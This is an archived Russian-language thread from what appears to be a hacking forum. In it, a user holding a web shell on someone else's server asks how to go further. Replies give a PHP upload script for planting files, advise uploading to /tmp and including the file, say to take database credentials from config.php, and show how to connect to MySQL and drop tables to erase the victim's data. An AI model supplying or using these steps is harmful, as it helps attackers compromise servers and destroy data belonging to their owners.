Помощь с PHP Кодом [Архив]

Просмотр полной версии : Помощь с PHP Кодом

antiforum

11.01.2007, 23:36

Продолжение истории с шеллом:
http://forum.antichat.ru/thread31056.html

Что бы не оффтопить в той теме - открываю еще одну.

Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

Т.е. все что я могу - это выполнять код php.

Посоветуйте что можно сделать в таких условиях.

Constantine

11.01.2007, 23:42

т.е чтобы не оффтопить в одной теме, ты решил оффтопить в двух. Оригинально

genom--

12.01.2007, 00:16

а написать код на php которые записывает файл и таким образом его залить на серв нельзя да =)

p-range

12.01.2007, 00:19

Вот код:
<?php
set_time_limit(0);
echo <<<HTML
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<center><b><font color=red> Загругзка файла на сервер </font></b><center> <br>
<tr>
<td><b>File:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Path:</b></td>
<td><input size="48" name="path" type="text"><input type="submit" value="OK"></td><br>
HTML;

if (isset($_POST['path'])){

$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "OK $uploadfile\n";
echo "Name:" .$_FILES['file']['name']. "\n";
echo "Ves:" .$_FILES['file']['size']. "\n";

} else {
print "Error:\n";
print_r($_FILES);
}
}
?>

EXSlim

12.01.2007, 01:12

->Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

cd /tmp
Туда и заливай.

p-range

12.01.2007, 01:20

cd /tmp
Туда и заливай.
потом include("/tmp/file.php");

antiforum

12.01.2007, 13:46

Ребята спасибо за ответы, буду разгребать.

Еще, у меня есть данные от базы данных, а так как шелл находится на локалхосте - то я могу без проблем к нему подключится....

Можно ли средствами php, подключисвшись к базе - стереть ее допустим?

ettee

12.01.2007, 17:21

Можно, необходимо знать логин и пароль для подключения. Обычно подключения из вне запрещены.
$host = "localhost"; // место расположения MySql
$db_name = "grol"; // имя базы
$db_user = "grol"; // пользователь базы
$db_password = "admin"; // пароль пользователя
$table_online = "online"; // имя таблицы
// соединяемся с MySQL и выбираем нужную базу
mysql_connect($host,$db_user,$db_password) or die(mysql_error());
mysql_select_db($db_name) or die(mysql_error())
//http://phpfaq.ru/mysql

Abra

12.01.2007, 17:57

логин и пароль соответственно ищи в файлах типа config.php движка который ее использует.

blackybr

12.01.2007, 18:16

ettee прав ) соединяешься с бд, а потом с помощью

mysql_query("ЗАПРОС"); делаешь в бд что хочешь )

например удалить таблицу

mysql_query("DROP название таблицы");

и тд

antiforum

13.01.2007, 04:45

Всем спасибо за помощь.

m0nzt3r

13.01.2007, 20:37

Ну значит закрыто.